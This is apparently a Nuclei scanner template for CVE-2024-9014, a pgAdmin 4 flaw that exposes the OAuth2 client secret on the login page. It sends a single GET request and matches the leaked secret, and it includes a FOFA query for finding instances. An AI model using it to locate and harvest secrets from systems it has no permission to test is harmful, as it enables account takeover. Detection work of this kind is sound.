id: CVE-2024-9014 info: name: pgAdmin 4 - Authentication Bypass author: s4e-io severity: critical description: | pgAdmin 4 versions 8.11 and earlier are vulnerable to a security flaw in OAuth2 authentication. This vulnerability allows an attacker to potentially obtain the client ID and secret, leading to unauthorized access to user data. impact: | Attackers can potentially obtain OAuth2 client ID and secret from exposed configuration in the login page, leading to unauthorized access to user data, authentication bypass, and compromise of pgAdmin 4 instances. remediation: | Update pgAdmin 4 to a version later than 8.11 that addresses the OAuth2 authentication vulnerability and properly secures client credentials from public exposure. reference: - https://github.com/EQSTLab/CVE-2024-9014 - https://github.com/pgadmin-org/pgadmin4/issues/7945 - https://nvd.nist.gov/vuln/detail/CVE-2024-9014 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H cvss-score: 9.9 cve-id: CVE-2024-9014 cwe-id: CWE-522 epss-score: 0.09685 epss-percentile: 0.94988 metadata: verified: true max-request: 1 vendor: pgadmin-org product: pgadmin4 fofa-query: "pgadmin4" tags: cve,cve2024,pgadmin,exposure,auth-bypass,vkev,vuln http: - raw: - | GET /login?next=/ HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: regex part: body negative: true regex: - 'OAUTH2_CLIENT_SECRET": null' - type: word part: body words: - 'pgAdmin 4' - 'OAUTH2_CLIENT_SECRET' condition: and - type: status status: - 200 # digest: 4b0a00483046022100bb8d0b6805d2db1309b1544df22751a5452a03b9b5ef8d095ff242e68c3cbabf022100d367462344dcceb4b69e71942e292f9b6b678a2f6317079c170502d79cb37803:922c64590222798bb761d5b6d8e72950